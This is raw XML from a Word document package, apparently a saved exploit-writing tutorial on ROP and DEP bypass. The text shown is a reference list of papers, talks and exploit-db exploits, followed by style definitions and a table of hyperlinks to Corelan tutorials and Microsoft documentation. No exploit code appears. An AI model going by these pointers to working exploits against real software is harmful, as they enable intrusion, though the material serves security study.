        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId209" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>A little return oriented exploitation on Windows x86 – Part 2 (Harmony Security – Stephen Fewer)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId210" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>(un)Smashing the Stack (Shawn Moyer)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId211" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>Paper</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId212">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://www.usenix.org/events/sec09/tech/slides/sotirov.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId213" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>Bypassing DEP case study (Audio Converter)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (sud0) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId214" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>Gentle introduction to return-oriented-programming</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId215" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>DEP in depth (Syscan Singapore – InsomniaSec)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Some good example ROP exploits can be found here :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>ProSSHD 1.2 remote post-auth exploit (</w:t>
      </w:r>
      <w:hyperlink r:id="rId216">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://www.exploit-db.com/exploits/12495</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>PHP 6.0 Dev str_transliterate() (</w:t>
      </w:r>
      <w:hyperlink r:id="rId217">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://www.exploit-db.com/exploits/12189</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>VUPlayer m3u buffer overflow (</w:t>
      </w:r>
      <w:hyperlink r:id="rId218">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://www.exploit-db.com/exploits/13756</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Sygate Personal Firewall 5.6 build 2808 ActiveX with DEP bypass (</w:t>
      </w:r>
      <w:hyperlink r:id="rId219">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://www.exploit-db.com/exploits/13834</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Castripper 2.50.70 (.pls) stack buffer overflow with DEP bypass (</w:t>
      </w:r>
      <w:hyperlink r:id="rId220">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://www.exploit-db.com/exploits/13768</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="lef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DejaVu Sans" w:cs="FreeSans"/>
      <w:color w:val="auto"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="pt-BR" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Heading"/>
    <w:next w:val="TextBody"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="200" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="DejaVu Sans" w:cs="FreeSans"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Heading"/>
    <w:next w:val="TextBody"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="140" w:after="120"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="DejaVu Sans" w:cs="FreeSans"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="Heading"/>
    <w:next w:val="TextBody"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="DejaVu Sans" w:cs="FreeSans"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="Heading 5"/>
    <w:basedOn w:val="Heading"/>
    <w:next w:val="TextBody"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="120" w:after="60"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="DejaVu Sans" w:cs="FreeSans"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>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Quotations">
    <w:name w:val="Quotations"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="0" w:after="283"/>
      <w:ind w:left="567" w:right="567"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corelan.be/index.php/author/admin1/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/08/tutorial1.png" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/index.php/2010/03/27/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/index.php/2010/03/27/quickzip-stack-bof-0day-a-box-of-chocolates/" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.abysssec.com/blog/2010/03/ken-ward-zipper-stack-bof-0day-a-not-so-typical-seh-exploit/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/bb736299(VS.85).aspx" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blogs.msdn.com/b/michael_howard/archive/2008/01/29/new-nx-apis-added-to-windows-vista-sp1-windows-xp-sp3-and-windows-server-2008.aspx" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://support.microsoft.com/kb/875352" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Data_Execution_Prevention" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/aa366553(VS.85).aspx" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/movies/corelanc0d3r_rop_tut_sploit_no_dep.mp4" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image2.png" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/movies/corelanc0d3r_rop_tut_sploit_with_dep.mp4" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image3.png" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/movies/corelanc0d3r_rop_tut_sploit_with_dep_debugger.mp4" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image4.png" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cseweb.ucsd.edu/~ebuchana/brss_ccs2008.pdf" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/aa366887(VS.85).aspx" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/aa366599(VS.85).aspx" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/aa366597(v=VS.85).aspx" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/bb736299(VS.85).aspx" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bernardodamele.blogspot.com/2009/12/dep-bypass-with-setprocessdeppolicy.html" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://uninformed.org/index.cgi?v=2&amp;a=4" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/aa366898(VS.85).aspx" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/aa366786(v=VS.85).aspx" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/ms681674(VS.85).aspx" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.packetstormsecurity.org/papers/general/Windows-DEP-WPM.txt" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image10.png" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image11.png" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image12.png" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.packetstormsecurity.org/papers/general/Windows-DEP-WPM.txt" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/corelan/mona" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://trailofbits.files.wordpress.com/2010/04/practical-rop.pdf" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image1.png" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image21.png" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.rm-to-mp3.net/download.html" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image5.png" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image6.png" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image7.png" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image44.png" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image45.png" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image9.png" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image22.png" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image23.png" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image24.png" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image25.png" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image26.png" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image27.png" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image28.png" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image29.png" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image30.png" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image180.png" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image32.png" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/ropstructure1.png" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image78.png" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sourceforge.net/projects/unxutils/" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image35.png" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/wp-content/uploads/2010/06/image36.png" 